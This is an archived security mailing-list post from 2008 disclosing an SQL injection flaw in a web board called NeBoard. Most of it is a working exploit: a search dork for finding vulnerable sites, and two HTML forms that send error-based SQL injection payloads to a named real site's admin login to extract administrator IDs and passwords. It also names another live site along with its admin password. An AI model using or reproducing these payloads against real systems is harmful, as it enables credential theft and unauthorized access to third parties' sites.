Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  file upload exploit

  Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability

  TGS CMS Remote Code Execution Exploit

  UNAK-CMS Lfi

From:Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:04.08.2008
Subject:NeBoard Sql Injection Vulnerability


# Discovered by : Alemin_Krali  

# NeBoard Sql Injection Vulnerability [Post Sql]

# Dork :inurl:show.asp?id= ref= step= level= page=

# 2 html form
1.Form:It takes it:ID NAME
2.Form:Admin Password
and later HTTP://SITE.COM/admin/board_edit.asp?id=IDNAME we are entering and 2.form Admin
Password ile Login we are becoming
#Ex:http://eng.habitat.or.kr/Hboard/admin/board_edit.asp?id=free_old
login password:test and you admin:)


<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin//login_confirm.asp"
method="post">      
<input type="submit" value="Go ID Name">        
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin//login_form.asp">

<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 ID from
BoardManager))--">



<body onload="document.LoginForm.Password.focus();">
<form name="LoginForm"
action="http://www.globalcircuit.co.kr/board//admin/login_confirm.asp" method="post">       
<input type="submit" value="Go ID table Admin Password">        
<input type="hidden" name="url"
value="http://www.globalcircuit.co.kr/board//admin/login_form.asp">

<input type="hidden" name="query" value="">
<input type="hidden" name="id" value="'and 1=convert(int,(select top 1 AdminPW from
BoardManager))--">





_________________________________________________________________
Gelen kutunuzda hiç yer kalmamasından bıktınız mı? Windows Live Hotmail şimdi size 5GB
ÜCRETSİZ depolama alanı sunuyor! Ücretsiz Windows Live Hotmail hesabınızı buradan alın!
http://get.live.com/mail/overview

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server